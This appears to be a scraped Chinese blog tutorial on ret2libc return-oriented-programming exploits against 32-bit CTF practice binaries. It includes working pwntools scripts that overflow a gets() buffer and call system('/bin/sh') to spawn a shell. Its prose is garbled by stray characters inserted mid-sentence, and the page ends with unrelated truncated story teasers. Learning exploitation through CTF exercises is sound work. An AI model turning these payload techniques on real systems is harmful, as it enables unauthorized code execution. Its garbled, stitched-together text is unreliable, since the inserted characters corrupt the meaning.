ROP-ret2libc

http://wooyun.jozxing.cc/static/drops/tips-6597.html

常用命令

  • 使用ldd命令可以查看目標(biāo)程序調(diào)用的so庫
$ldd level2 
    linux-gate.so.1 =>  (0xb7781000)
    libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75c4000)
    /lib/ld-linux.so.2 (0xb7782000)
$ cp /lib/i386-linux-gnu/libc.so.6 libc.so
  • 查看plt表
objdump -d -j .plt level2
  • 查看got表
objdump -R level2

-找libc中字符串(libc=ELF('./libc.so'))

libc.search('/bin/sh')

ret2libc

條件

?  ret2libc1 checksec ret2libc1    
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

并且需要同時提供了 system 地址與 /bin/sh 的地址

過程

源程序為 32 位嚎货,開啟了 NX 保護。下面來看一下程序源代碼,確定漏洞位置

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [sp+1Ch] [bp-64h]@1

  setvbuf(stdout, 0, 2, 0);
  setvbuf(_bss_start, 0, 1, 0);
  puts("RET2LIBC >_<");
  gets((char *)&v4);
  return 0;
}

可以看到在執(zhí)行 gets 函數(shù)的時候出現(xiàn)了棧溢出束莫。此外糙申,利用 ropgadget破婆,我們可以查看是否有 /bin/sh 存在

?  ret2libc1 ROPgadget --binary ret2libc1 --string '/bin/sh'          
Strings information
============================================================
0x08048720 : /bin/sh

確實存在篷扩,再次查找一下是否有 system 函數(shù)存在碾牌。經(jīng)在 ida 中查找思灰,確實也存在玷犹。

.plt:08048460 ; [00000006 BYTES: COLLAPSED FUNCTION _system. PRESS CTRL-NUMPAD+ TO EXPAND]

那么,我們直接返回該處洒疚,即執(zhí)行 system 函數(shù)歹颓。相應(yīng)的 payload 如下

#!/usr/bin/env python
from pwn import *

sh = process('./ret2libc1')

binsh_addr = 0x8048720
system_plt = 0x08048460
payload = flat(['a' * 112, system_plt, 'b' * 4, binsh_addr])
sh.sendline(payload)

sh.interactive()

這里我們需要注意函數(shù)調(diào)用棧的結(jié)構(gòu),如果是正常調(diào)用 system 函數(shù)油湖,我們調(diào)用的時候會有一個對應(yīng)的返回地址巍扛,這里以'bbbb' 作為虛假的地址,其后參數(shù)對應(yīng)的參數(shù)內(nèi)容乏德。

這個例子相對來說簡單撤奸,同時提供了 system 地址與 /bin/sh 的地址,但是大多數(shù)程序并不會有這么好的情況。

ret2libc2

該題目與例 1 基本一致寂呛,只不過不再出現(xiàn) /bin/sh 字符串怎诫,所以此次需要我們自己來讀取字符串,所以我們需要兩個 gadgets贷痪,第一個控制程序讀取字符串幻妓,第二個控制程序執(zhí)行 system(""/bin/sh")。由于漏洞與上述一致劫拢,這里就不在多說肉津,具體的 exp 如下

##!/usr/bin/env python
from pwn import *

sh = process('./ret2libc2')

gets_plt = 0x08048460
system_plt = 0x08048490
pop_ebx = 0x0804843d
buf2 = 0x804a080
payload = flat(
    ['a' * 112, gets_plt, pop_ebx, buf2, system_plt, 0xdeadbeef, buf2])
sh.sendline(payload)
sh.sendline('/bin/sh')
sh.interactive()

需要注意的是,我這里向程序中 bss 段的 buf2 處寫入 /bin/sh 字符串舱沧,并將其地址作為 system 的參數(shù)傳入妹沙。這樣以便于可以獲得 shell。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末熟吏,一起剝皮案震驚了整個濱河市距糖,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌牵寺,老刑警劉巖悍引,帶你破解...
    沈念sama閱讀 219,039評論 6 508
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異帽氓,居然都是意外死亡趣斤,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,426評論 3 395
  • 文/潘曉璐 我一進店門黎休,熙熙樓的掌柜王于貴愁眉苦臉地迎上來浓领,“玉大人,你說我怎么就攤上這事势腮×罚” “怎么了?”我有些...
    開封第一講書人閱讀 165,417評論 0 356
  • 文/不壞的土叔 我叫張陵嫉鲸,是天一觀的道長撑蒜。 經(jīng)常有香客問我歹啼,道長玄渗,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,868評論 1 295
  • 正文 為了忘掉前任狸眼,我火速辦了婚禮藤树,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘拓萌。我一直安慰自己岁钓,他們只是感情好,可當(dāng)我...
    茶點故事閱讀 67,892評論 6 392
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著屡限,像睡著了一般品嚣。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上钧大,一...
    開封第一講書人閱讀 51,692評論 1 305
  • 那天翰撑,我揣著相機與錄音,去河邊找鬼啊央。 笑死眶诈,一個胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的瓜饥。 我是一名探鬼主播逝撬,決...
    沈念sama閱讀 40,416評論 3 419
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼乓土!你這毒婦竟也來了宪潮?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,326評論 0 276
  • 序言:老撾萬榮一對情侶失蹤趣苏,失蹤者是張志新(化名)和其女友劉穎坎炼,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體拦键,經(jīng)...
    沈念sama閱讀 45,782評論 1 316
  • 正文 獨居荒郊野嶺守林人離奇死亡谣光,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,957評論 3 337
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了芬为。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片萄金。...
    茶點故事閱讀 40,102評論 1 350
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖媚朦,靈堂內(nèi)的尸體忽然破棺而出氧敢,到底是詐尸還是另有隱情,我是刑警寧澤询张,帶...
    沈念sama閱讀 35,790評論 5 346
  • 正文 年R本政府宣布孙乖,位于F島的核電站,受9級特大地震影響份氧,放射性物質(zhì)發(fā)生泄漏唯袄。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,442評論 3 331
  • 文/蒙蒙 一蜗帜、第九天 我趴在偏房一處隱蔽的房頂上張望恋拷。 院中可真熱鬧,春花似錦厅缺、人聲如沸蔬顾。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,996評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽诀豁。三九已至窄刘,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間舷胜,已是汗流浹背都哭。 一陣腳步聲響...
    開封第一講書人閱讀 33,113評論 1 272
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留逞带,地道東北人欺矫。 一個月前我還...
    沈念sama閱讀 48,332評論 3 373
  • 正文 我出身青樓,卻偏偏與公主長得像展氓,于是被迫代替她去往敵國和親穆趴。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 45,044評論 2 355

推薦閱讀更多精彩內(nèi)容

  • 0x01 Start checksec 的時候可以看到程序沒有打開任何的安全保護措施遇汞,然后查看IDA下的匯編代碼未妹,...
    Nevv閱讀 1,683評論 0 2
  • 一、Python簡介和環(huán)境搭建以及pip的安裝 4課時實驗課主要內(nèi)容 【Python簡介】: Python 是一個...
    _小老虎_閱讀 5,746評論 0 10
  • 一《夜雨》 夜雨綿綿微風(fēng)寒 點點相思涌心間 冷雨無情花枝落 憂憂悲寂撥心弦 二《落葉》 落葉飄飄墜深淵 絲絲愛戀一...
    流過一紙荒唐淚閱讀 276評論 0 1
  • 氣清景明空入,踏青賞花络它。 又是三天小長假,想來無所事事歪赢,索性回趟家陪老人家聊聊天化戳。 朋友圈照舊是各種節(jié)日刷屏,真不明白...
    穆貲閱讀 246評論 0 0
  • 今天是中國元宵節(jié)埋凯!也是泰國的萬佛節(jié)場面很濃重点楼!寺院附近很多眾生來寺院供養(yǎng)并參加祈福儀式,作為佛家弟子座在前臺受幾百...
    大智LSQ閱讀 245評論 1 3